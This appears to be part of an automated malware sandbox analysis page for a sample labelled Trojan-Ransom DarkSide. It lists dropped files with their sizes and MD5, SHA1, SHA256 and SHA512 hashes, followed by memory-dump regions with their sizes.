                                                                                                                    e6359dfc6aadbdfa49ea5bdee9f85a1cf717fac6aeaf4404317af6bd51efc93a7cb54339a5951c75a06bd09f8ffdf7ce8cfc8f85d9153dedc4762e8f73611c6c

                                                                                                                    Download Submit

                                                                                                                  • C:\Windows\System32\catroot2\dberr.txt
                                                                                                                    Filesize

                                                                                                                    3KB

                                                                                                                    MD5

                                                                                                                    f1473d4da48614875fc0d3d73e4d4181

                                                                                                                    SHA1

                                                                                                                    5325f17783c31fbebaa45345f9ee81610cd2433d

                                                                                                                    SHA256

                                                                                                                    7c7c535d1d8a066dd25ddfb969b698091fbe66e653d7b8210ad441dd85375d4d

                                                                                                                    SHA512

                                                                                                                    5bb7909016725030b3933f648f266594f884f88ab813d47a1b151b76084de8ab09cbbe92b1b08632abfe967fbab26632cf6604812c2a11cd16f4e2d5483c8983

                                                                                                                    Download Submit

                                                                                                                  • C:\Windows\System32\catroot2\dberr.txt
                                                                                                                    Filesize

                                                                                                                    3KB

                                                                                                                    MD5

                                                                                                                    34cb19b5068a88e2f555082a36e74992

                                                                                                                    SHA1

                                                                                                                    5a88eb99a842967ca86aee2a596de444cf821997

                                                                                                                    SHA256

                                                                                                                    293c441b61d7641370a5e30182f0c1933ee51e2a6acde50fd4e1338120b17a8b

                                                                                                                    SHA512

                                                                                                                    55fa59889122fb2f1c70d8ad7652fe59111b8db79d6172bc808513812390da41f98e510ecc1cc0ae226d042f9758737a4a5f59a63a43e13ecfecd856e54083cc

                                                                                                                    Download Submit

                                                                                                                  • C:\Windows\System32\catroot2\dberr.txt
                                                                                                                    Filesize

                                                                                                                    5KB

                                                                                                                    MD5

                                                                                                                    4b820ad6e2e0c1aa2321d087b00a6be0

                                                                                                                    SHA1

                                                                                                                    ce5daa91c80c4d1a3c0c5c42a724d52582b03e19

                                                                                                                    SHA256

                                                                                                                    c1d9a5eb16a72c30dce492ab96de336cd3d504c800ad0fe1617172f58b74b968

                                                                                                                    SHA512

                                                                                                                    d0c84fc9885a3e464493872c6864e3b834a170fcd2091ba9740d307b5fa128c689570c39fc02cc8e1bc52df49f386f2e36ff95d4e3760e967492c0d93cc0e8df

                                                                                                                    Download Submit

                                                                                                                  • C:\Windows\System32\catroot2\dberr.txt
                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    5ce753e50e4eeb5657a94b3d2409f302

                                                                                                                    SHA1

                                                                                                                    c99518dfe9c74943caa86fd527d8d63c3922f2ca

                                                                                                                    SHA256

                                                                                                                    9ea9b7b6ffe4fa6afc796b0fa673dd21b82d5bf525f1d53d978c9574d0e49410

                                                                                                                    SHA512

                                                                                                                    651ffaa8a83d67c24c8d5e7a9d10a0b27a1d610e6ae11532e068c140fe34cc787b6baf794be3f8e766d887d7064dd138eeb4e43083221e8cbc12b5beb042488f

                                                                                                                    Download Submit

                                                                                                                  • C:\Windows\System32\catroot2\dberr.txt
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    MD5

                                                                                                                    38bd94c05fee56c33fd086f9b68e2c2a

                                                                                                                    SHA1

                                                                                                                    1f301f2f5d38e28dfd16a563f244cc282e4f0440

                                                                                                                    SHA256

                                                                                                                    01e7d22e595a7965df393f2f788a6e4903ac4e2dcb1fafa49b0c64d52f900184

                                                                                                                    SHA512

                                                                                                                    2f4d2918150a39c4d554956ff5f6e20099cc51743d05cbc4ae1b26d6d8382779455b644ac94757c6867dc01da89a7981e9bc63f19bf386c85abce5858d38a647

                                                                                                                    Download Submit

                                                                                                                  • C:\Windows\System32\catroot2\dberr.txt
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    MD5

                                                                                                                    97da0d67787429ffbe569b87e2271856

                                                                                                                    SHA1

                                                                                                                    34d7e10b6259deea8d2c9b0314c704df6d6ec509

                                                                                                                    SHA256

                                                                                                                    c737fa415b2d6f88a87eac9c4c283a83a1349f3cfe5119e70bd8aae26306f95a

                                                                                                                    SHA512

                                                                                                                    78f5977ebb8167f02d1c519ba7b8c8a2c26cf50af183ad5aee63945744651cfaff129940933695da475cdd2bf9b80e1e9583cdd988f274dbb8df1d5c281096b0

                                                                                                                    Download Submit

                                                                                                                  • \??\c:\users\admin\desktop\00416\trojan-ransom.win32.darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe
                                                                                                                    Filesize

                                                                                                                    59KB

                                                                                                                    MD5

                                                                                                                    cfcfb68901ffe513e9f0d76b17d02f96

                                                                                                                    SHA1

                                                                                                                    766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f

                                                                                                                    SHA256

                                                                                                                    17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61

                                                                                                                    SHA512

                                                                                                                    0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c

                                                                                                                    Download Submit

                                                                                                                  • memory/404-17556-0x0000000006410000-0x000000000642A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    104KB

                                                                                                                    Download

                                                                                                                  • memory/404-17239-0x0000000005F40000-0x0000000005F8C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    304KB

                                                                                                                    Download

                                                                                                                  • memory/404-17215-0x0000000005960000-0x0000000005CB4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    3.3MB

                                                                                                                    Download

                                                                                                                  • memory/404-17555-0x0000000007570000-0x0000000007BEA000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    6.5MB

                                                                                                                    Download

                                                                                                                  • memory/404-17590-0x0000000006F90000-0x0000000007026000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    600KB

                                                                                                                    Download

                                                                                                                  • memory/404-17591-0x00000000064D0000-0x00000000064F2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                    Download

                                                                                                                  • memory/404-17238-0x0000000005F10000-0x0000000005F2E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    120KB

                                                                                                                    Download

                                                                                                                  • memory/404-17210-0x0000000002940000-0x0000000002976000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    216KB

                                                                                                                    Download

                                                                                                                  • memory/404-17211-0x0000000005130000-0x0000000005758000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    6.2MB

                                                                                                                    Download

                                                                                                                  • memory/404-17212-0x0000000004E60000-0x0000000004E82000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                    Download

                                                                                                                  • memory/404-17214-0x0000000004F70000-0x0000000004FD6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    408KB

                                                                                                                    Download

                                                                                                                  • memory/404-17213-0x0000000004F00000-0x0000000004F66000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    408KB

                                                                                                                    Download

                                                                                                                  • memory/1120-84-0x00000266F0A00000-0x00000266F0A76000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    472KB

                                                                                                                    Download

                                                                                                                  • memory/1120-73-0x00000266F0450000-0x00000266F0472000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                    Download

                                                                                                                  • memory/1120-86-0x00000266F09C0000-0x00000266F09DE000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    120KB

                                                                                                                    Download

                                                                                                                  • memory/1120-83-0x00000266F0930000-0x00000266F0974000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    272KB

                                                                                                                    Download

                                                                                                                  • memory/1428-17588-0x0000000000400000-0x0000000000477000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    476KB

                                                                                                                    Download

                                                                                                                  • memory/1428-17523-0x0000000000400000-0x0000000000477000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    476KB

                                                                                                                    Download

                                                                                                                  • memory/1840-53-0x00000245F3620000-0x00000245F3621000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-54-0x00000245F3620000-0x00000245F3621000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-45-0x00000245F3620000-0x00000245F3621000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-46-0x00000245F3620000-0x00000245F3621000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-44-0x00000245F3620000-0x00000245F3621000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-52-0x00000245F3620000-0x00000245F3621000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-50-0x00000245F3620000-0x00000245F3621000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-56-0x00000245F3620000-0x00000245F3621000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-51-0x00000245F3620000-0x00000245F3621000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1840-55-0x00000245F3620000-0x00000245F3621000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/1872-2051-0x0000000000400000-0x0000000000515000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.1MB

                                                                                                                    Download

                                                                                                                  • memory/1872-3486-0x0000000002350000-0x000000000236B000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    108KB

                                                                                                                    Download

                                                                                                                  • memory/1872-4192-0x0000000000400000-0x0000000000515000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.1MB

                                                                                                                    Download

                                                                                                                  • memory/2412-17209-0x0000000000400000-0x00000000010A9000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    12.7MB

                                                                                                                    Download

                                                                                                                  • memory/2412-2052-0x0000000000400000-0x00000000010A9000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    12.7MB

                                                                                                                    Download

                                                                                                                  • memory/2412-7754-0x0000000000400000-0x00000000010A9000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    12.7MB

                                                                                                                    Download

                                                                                                                  • memory/2412-17586-0x0000000000400000-0x00000000010A9000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    12.7MB

                                                                                                                    Download

                                                                                                                  • memory/2412-14079-0x0000000000400000-0x00000000010A9000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    12.7MB

                                                                                                                    Download

                                                                                                                  • memory/3352-99-0x0000000000400000-0x0000000000424000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    144KB

                                                                                                                    Download

                                                                                                                  • memory/3352-943-0x0000000000400000-0x0000000000424000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    144KB

                                                                                                                    Download

                                                                                                                  • memory/3512-2238-0x0000000000400000-0x0000000001CC4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    24.8MB

                                                                                                                    Download

                                                                                                                  • memory/3512-5197-0x0000000000400000-0x0000000001CC4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    24.8MB

                                                                                                                    Download

                                                                                                                  • memory/3952-7749-0x0000000002980000-0x0000000002981000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/3952-7747-0x0000000002960000-0x0000000002961000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/3952-7744-0x0000000000DA0000-0x0000000000DA1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/3952-7745-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/3952-7746-0x0000000002950000-0x0000000002951000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/3952-7748-0x0000000002970000-0x0000000002971000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/3952-7750-0x0000000002990000-0x0000000002991000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/3952-7752-0x0000000000400000-0x0000000000CD1000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8.8MB

                                                                                                                    Download

                                                                                                                  • memory/3952-7743-0x0000000000D40000-0x0000000000D41000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                    Download

                                                                                                                  • memory/4688-96-0x0000000000FC0000-0x000000000102E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    440KB

                                                                                                                    Download

                                                                                                                  • memory/4688-101-0x0000000005E40000-0x00000000063E4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.6MB

                                                                                                                    Download

                                                                                                                  • memory/4688-111-0x00000000058F0000-0x00000000058FA000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    40KB

                                                                                                                    Download

                                                                                                                  • memory/4688-110-0x0000000005930000-0x00000000059C2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    584KB

                                                                                                                    Download

                                                                                                                  • memory/5060-17206-0x0000000000400000-0x0000000000488000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    544KB

                                                                                                                    Download

                                                                                                                  • memory/5156-17284-0x0000000000400000-0x000000000054A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                    Download

                                                                                                                  • memory/5156-17589-0x0000000000400000-0x000000000054A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                    Download

                                                                                                                  • memory/5156-2610-0x0000000000400000-0x000000000054A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                    Download

                                                                                                                  • memory/5156-9535-0x0000000000400000-0x000000000054A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                    Download

                                                                                                                  • memory/5156-6209-0x0000000000400000-0x000000000054A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                    Download

                                                                                                                  • memory/5156-16304-0x0000000000400000-0x000000000054A000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                    Download

                                                                                                                  • memory/5412-17244-0x0000000000400000-0x000000000088E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4.6MB

                                                                                                                    Download

                                                                                                                  • memory/5412-17457-0x0000000000400000-0x000000000088E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4.6MB

                                                                                                                    Download

                                                                                                                  • memory/5576-17524-0x0000000000400000-0x00000000004C4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    784KB

                                                                                                                    Download

                                                                                                                  • memory/5576-17698-0x0000000000400000-0x00000000004C4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    784KB

                                                                                                                    Download

                                                                                                                  • memory/5584-13074-0x0000000004F90000-0x0000000004F96000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    24KB

                                                                                                                    Download

                                                                                                                  • memory/5584-12897-0x0000000007340000-0x000000000759C000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    2.4MB

                                                                                                                    Download

                                                                                                                  • memory/5584-11401-0x00000000004D0000-0x0000000000620000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                    Download

                                                                                                                  • memory/5676-17608-0x0000000000380000-0x0000000000413000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    588KB

                                                                                                                    Download

                                                                                                                  • memory/6892-7742-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    128KB

                                                                                                                    Download

                                                                                                                  • memory/9012-17236-0x0000000000400000-0x000000000099B000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.6MB

                                                                                                                    Download

                                                                                                                  • memory/9012-17601-0x0000000000400000-0x000000000099B000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.6MB

                                                                                                                    Download

                                                                                                                  • memory/9012-17600-0x0000000000400000-0x000000000099B000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.6MB

                                                                                                                    Download

                                                                                                                  • memory/9012-17639-0x0000000000400000-0x000000000099B000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.6MB

                                                                                                                    Download